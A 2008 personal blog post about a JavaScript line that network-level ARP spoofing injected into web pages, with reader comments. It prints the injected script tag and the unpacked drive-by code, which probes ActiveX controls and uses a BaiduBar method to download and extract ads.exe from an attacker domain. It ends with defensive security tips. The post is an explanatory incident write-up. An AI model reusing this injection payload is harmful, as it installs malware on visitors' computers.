Anjanesh

Assignment Statements, Comparisons & Observations
Font: Size: + -

Injected JavaScript line : 222360.com & asdafdgfgf.com

Tuesday, January 29, 2008

Im a guy who is pretty much cautious about computer security, though Im not a network or security guru. The last time I formatted my hard-disk & installed my OS was sometime in December 2004 when my old PC was no good anymore and had to get a new one in January 2005. It was a HP with Windows XP SP2 OEM pre-loaded. Based on my previous years of experience, I managed to stay away from all possible malicious worms entering my PC. I never login as Administrator except for installation and global configuration settings. I am always logged in under User mode. I guess a Linux user is probably laughing at this saying "thats the way it always was". In Linux, using a non-root user is a standard for two reasons :
1. You can login as root in shell within a user environment to care of admin issues. (The same is possible in Windows XP using right-click > Run as)
2. Most installations can be done to any location - unlike C:\Program Files & C:\Windows where many installers require to add files to.

But when you install Windows, it creates a user under the Administrators group. So as a result, Windows users get administrative rights by default. And thus, Windows system files are open to intrusion when someone surfs the net using IE and allows the website to run an ActiveX Object.

During the last week of December 2007, I started noticing that all my html webpages had a JavaScript line injected into it right at the top of the page.
It was linking to a subdomain of 222360.com & later on to asdafdgfgf.com - both domains were created recently last year. And example of the injected line was like this :

<SCRIPT LANGUAGE="javascript1.2" SRC="http://x.222360.com/un.js"></SCRIPT>
There are many variants of this line - different letters for subdomain and ads.js before it was un.js.
The code is packed using packer. The unpacked code shows that it tries to create 5 ActiveX Objects. But the last one attempts to download an ads.cab file if BaiduToolBar plugin is installed and extract ads.exe out of the cab file and perhaps run it (if the third argument, 0, implies it). What ads.exe does is still unclear.
if (document.cookie.indexOf('OKSUN') == -1)
 {
        try
         {
                var e;
                var ado = (document.createElement("object"));
                ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
                var as = ado.createobject("Adodb.Stream", "")
         }
        catch(e){};
        finally
         {
                var expires = new Date();
                expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
                document.cookie = 'OKSUN=SUN;path=/;expires=' + expires.toGMTString();
                document.write("<\/script>");
 
                if(e != "[object Error]")
                 {
                        document.write("<\/script>")
                 }
                else
                 {
                        try
                         {
                                var f;
                                var storm = new ActiveXObject("MPS.StormPlayer")
                         }
                        catch(f){};
                        finally
                         {
                                if (f != "[object Error]")
                                {
                                       document.write("<\/script>");
                                       document.write("")
                                }
                         }
 
                        try
                         {
                                var g;
                                var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
                         }
                        catch(g){};
                        finally
                         {
                                if (g != "[object Error]")
                                 {
                                        document.write("<\/script>");
                                        document.write("")
                                 }
                         }
 
                        try
                         {
                                var h;
                                var thunder = new ActiveXObject("DPClient.Vod")
                         }
                        catch(h){};
                        finally
                         {
                                if (h != "[object Error]")
                                 {
                                        document.write("<\/script>");
                                        document.write("")
                                 }
                         }
 
                        try
                         {
                                var i;
                                var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
                         }
                        catch(i){};
                        finally
                         {
                                if (i != "[object Error]")
                                 {
                                        document.write("")
                                 }
                         }
 
                        try
                         {
                                var j;
                                var obj = new ActiveXObject("BaiduBar.Tool")
                         }
                        catch(j){};
                        finally
                         {
                                if (j != "[object Error]")
                                 {
                                        obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
                                        document.write("")
                                 }
                         }
 
                        if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]")
                         {
                                document.write("")
                         }
                 }
         }
 }

I was stunned at how could this have happened thinking all my browsers were infected with a worm that modifies the HTML source. But none of the localhost pages had that JS line and a simple code to retrieve the contents of a URL or using gnuWin32 wget showed that the injected line still persists. I ended formatting my PC anyway and resintalling everything including a full Windows update. But the first thing I did before connecting to my LAN was adding entries to my hosts file mapping 222360.com, [a-z].222360.com, asdafdgfgf.com, [a-z].asdafdgfgf.com to 127.0.0.1.

Though the JS line kept coming in, I didnt regret the format + install task as I got rid off a number of unnecessary stuff.
The only other way this could possibly come in was from the ISP, so I thought. But the ISP tech support wouldnt listen to such a story. It was only a couple of days later when I found out on the net that the same issue was experience elsewhere by as mentioned in this Experts Exchange thread and then later 2 guys from Mumbai posted the exact same problem to my devnetwork thread. Apparently, all of our entire LAN was suffering downtimes and JS line injection. It was clear that its coming from the network and not from the ISP as the local cable operator's network has a number of ISPs plugged in. Whats still unclear is, how this attack took place at relatively the same time and that too in Asia.

After visiting one of the forum guy's cable operator's office, and checked this out with the help of a network expert, it was found that this is a result of an overwhelming ARP requests being sent and spoofing the gateway.
From WikiPedia :

The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. Generally, the aim is to associate the attacker's MAC address with the IP address of another node (such as the default gateway). Any traffic meant for that IP address would be mistakenly sent to the attacker instead. The attacker could then choose to forward the traffic to the actual default gateway (passive sniffing) or modify the data before forwarding it (man-in-the-middle attack). The attacker could also launch a Denial of Service attack against a victim by associating a nonexistent MAC address to the IP address of the victim's default gateway.

A virus called W32.VirutA (Risk Level reported by symantec as Very Low) was found on many customers' PC which seem to be doing exactly that - since after a cleanup of most of the PCs, the attacks diminished.

Keep your PC safe :

  1. Use C: for Windows and installed programs and keep separate drives for your data - preferably on a separate hard-disk. In case of an sudden reformat or reinstallation of Windows, you don't need to spend the rest of your day searching for your data files and backing it up.
  2. Login as a user having non administrative rights. Preferably under Users group. For installation, login as Administrator, install, and come back to your user login. Most software these days, allow you to specify the data directory to another location other than its default one. Find that and change it to the other drive. At the worst case, just give the user full permissions to a particular file/folder (in C:\Program Files) that requires writing to. At no cost should you be giving write permission to anything in C:\Windows.
  3. Use Mozilla FireFox as the default web browser. It doesn't support ActiveX Objects
  4. Install an anti-virus and update it regularly.
  5. Use a Firewall - these days, viruses attack the network, not your hard-disk. Windows XP SP2 comes with its own Firewall
  6. Dont use cracked software programs for your needs - there are many free versions equally good or express editions intended at the beginners & intermidiate level which are available for download for free. I already blogged about this before.
  7. Use AdBlockPlus extension for FireFox - you can block as many external references you want. For example, I added *.222360.com to block anything coming from that domain. This is also the best way to block Google Ads.

5 comments:

to the limit and beyond... said...

We have developed windows application that can pinpoint the PC ARP spoofing in the network. We are releasing that as freeware.

You can download ARProtect from www.netoptima.in/arprotect

http://www.netoptima.in/arprotect should solve your problem


Abhiram said...

I've got the exact same problem and my ISP has absolutely no idea about it. Downloading the tool from netoptima right now and I hope it works. Thanks.


Anjanesh said...

I did try using netoptima's tool - but kept giving different IP each time I ran it.
So either, a whole lot of PCs are infected or somehow the infected PC's IP keeps changing.


Abhiram said...

The tool didn't work for me. I did a complete scan and got rid of about 13 different instances of viruses. I thought that did the job, but looks like it didn't. And the tool isn't working for me, maybe the IPs of the other systems on the network are not visible to me.

Any idea on where exactly this virus exists? Or what name it runs under?


Anjanesh said...

The virus seems to be virut.
A google search on virut will give you loads of information on what it does.

But it can be any other virus as well that performs ARP spoofing.